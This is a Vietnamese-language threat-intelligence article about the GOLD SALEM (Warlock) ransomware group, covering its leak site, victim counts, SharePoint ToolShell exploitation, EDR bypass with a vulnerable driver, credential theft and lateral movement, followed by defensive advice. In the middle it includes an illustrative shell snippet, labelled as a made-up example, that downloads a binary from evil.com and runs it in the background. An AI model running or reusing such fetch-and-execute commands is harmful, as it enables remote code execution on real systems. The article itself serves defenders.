Các nhà nghiên cứu Counter Threat Unit™ (CTU) đang theo dõi một nhóm tác nhân đe dọa tinh vi được gọi là Warlock Group, mà CTU định danh là GOLD SALEM. Kể từ tháng 3 năm 2025, nhóm này đã xâm nhập mạng lưới doanh nghiệp và vượt qua các giải pháp bảo mật để triển khai mã độc ransomware tùy chỉnh của mình.

Mặc dù Microsoft gọi nhóm này là Storm-2603 và liên kết nó “với mức độ tin cậy vừa phải là một tác nhân đe dọa có trụ sở tại Trung Quốc”. Tuy nhiên, các nhà nghiên cứu CTU vẫn chưa xác nhận bất kỳ sự quy kết địa lý nào.

Hoạt động của GOLD SALEM và Mã Độc Ransomware Warlock

Tính đến giữa tháng 9 năm 2025, GOLD SALEM đã công bố 60 nạn nhân trên trang rò rỉ chuyên dụng của mình. Con số này đặt nhóm vào mức trung bình trong các hoạt động ransomware về số lượng nạn nhân trong năm nay. Các mục tiêu bao gồm các công ty thương mại nhỏ, cơ quan chính phủ và các tập đoàn đa quốc gia ở Bắc Mỹ, Châu Âu và Nam Mỹ.

Điều không điển hình là nhóm này đã tránh các tổ chức Trung Quốc và Nga cho đến ngày 8 tháng 9. Khi đó, một nhà cung cấp dịch vụ kỹ thuật có trụ sở tại Nga trong lĩnh vực sản xuất điện xuất hiện trên trang rò rỉ. Điều này cho thấy các tác nhân có thể hoạt động từ bên ngoài các khu vực pháp lý tích cực truy lùng những kẻ tống tiền bằng mã độc ransomware.

Trang rò rỉ do Tor host của GOLD SALEM liệt kê nạn nhân theo đợt. Tính đến ngày 16 tháng 9, chỉ có 19 nạn nhân (32%) có dữ liệu bị đánh cắp được công bố. Trong khi đó, 27 nạn nhân (45%) được báo cáo là đã được bán cho người mua riêng.

GOLD SALEM cũng đã đăng tên các nạn nhân bị xâm phạm bởi các hoạt động mã độc ransomware khác. Nhóm này lần đầu tiên xuất hiện công khai thông qua một bài đăng vào tháng 6 năm 2025 trên diễn đàn ngầm RAMP, tìm kiếm các exploit cho các ứng dụng doanh nghiệp (Veeam, ESXi, SharePoint) và các công cụ để vô hiệu hóa hệ thống phát hiện và phản hồi điểm cuối (EDR).

Những con số này có thể bị thổi phồng, và ba nạn nhân đã được liệt kê trước đó đã bị xóa. Điều này cho thấy khả năng xác thực dữ liệu hoặc điều chỉnh khoản thanh toán. Trang rò rỉ của nhóm chỉ định một ngày đếm ngược tiền chuộc cho mỗi nạn nhân, thường là 12–14 ngày sau khi niêm yết, để gây áp lực buộc phải thanh toán nhanh chóng.

Vẫn chưa rõ liệu các bài đăng này nhắm mục tiêu vào các vụ xâm nhập trực tiếp hay tuyển dụng các chi nhánh cho mô hình ransomware-as-a-service. Tuy nhiên, rõ ràng đây là một mối đe dọa mạng đáng kể và nhóm này chuyên về mã độc ransomware.

Chiến thuật Tấn công của GOLD SALEM

Khai thác Lỗ Hổng CVE và Web Shell

Các nhà nghiên cứu CTU đã quan sát thấy nhóm này khai thác Microsoft SharePoint sử dụng chuỗi khai thác ToolShell. Chuỗi này lợi dụng các lỗ hổng CVE như CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, và CVE-2025-53771 để cài đặt một web shell ASPX.

Thông qua web shell này, những kẻ tấn công đã thực thi các lệnh. Mục tiêu là tải xuống một máy chủ WebSockets dựa trên Golang, cấp quyền truy cập từ xa liên tục.

# Ví dụ lệnh CLI minh họa việc tải xuống và thực thi một máy chủ WebSockets
# Lưu ý: Nội dung gốc không cung cấp lệnh cụ thể, đây là ví dụ.
wget http://evil.com/golang_websocket_server -O /tmp/server
chmod +x /tmp/server
nohup /tmp/server &

Vượt qua EDR và Duy trì Quyền truy cập

Nhóm này đã vượt qua hệ thống EDR bằng cách đổi tên một trình điều khiển Baidu Antivirus dễ bị tấn công (CVE-2024-51324) thành googleApiUtil64.sys. Kỹ thuật này cho phép chúng chấm dứt các tác nhân bảo mật.

Vào tháng 8, GOLD SALEM đã lạm dụng công cụ DFIR mã nguồn mở Velociraptor để thiết lập các tunnel mạng Visual Studio Code. Điều này minh họa công cụ thích ứng và sự sẵn lòng của chúng trong việc tái sử dụng các tiện ích hợp pháp cho mục đích độc hại.

Hoạt động Hậu xâm nhập

Các hoạt động sau khi xâm nhập bao gồm thu thập thông tin đăng nhập bằng Mimikatz nhắm mục tiêu vào bộ nhớ LSASS. Chúng còn thực hiện di chuyển ngang qua PsExec và Impacket.

Việc triển khai payload mã độc ransomware Warlock được thực hiện thông qua các đối tượng chính sách nhóm (Group Policy Objects – GPO).

Biện pháp Phòng ngừa và Ứng phó với Mã Độc Ransomware

Để bảo vệ khỏi mối đe dọa mạng này, các tổ chức nên duy trì việc vá lỗi tích cực cho các dịch vụ hướng ra internet. Việc triển khai giám sát bề mặt tấn công liên tục cũng là cần thiết.

Giám sát điểm cuối chủ động và phản ứng sự cố nhanh chóng là rất quan trọng để phát hiện khai thác zero-day vulnerability. Các biện pháp bảo vệ của Sophos như Troj/WebShel-F và Troj/Warlock-B có thể xác định hoạt động liên quan đến mã độc ransomware này.

Các nhà nghiên cứu CTU khuyến nghị xem xét và hạn chế quyền truy cập bằng cách sử dụng các chỉ số thỏa hiệp (IOCs) liên quan. Các tổ chức nên xác thực các hash này dựa trên dữ liệu từ mạng và điểm cuối. Đồng thời, đảm bảo phân đoạn mạnh mẽ để hạn chế di chuyển ngang.

Săn lùng mối đe dọa liên tục để tìm kiếm dấu hiệu khai thác ToolShell và các kỹ thuật BYOVD có thể giảm thêm rủi ro. Rủi ro này do hoạt động mã độc ransomware Warlock đang phát triển của GOLD SALEM gây ra.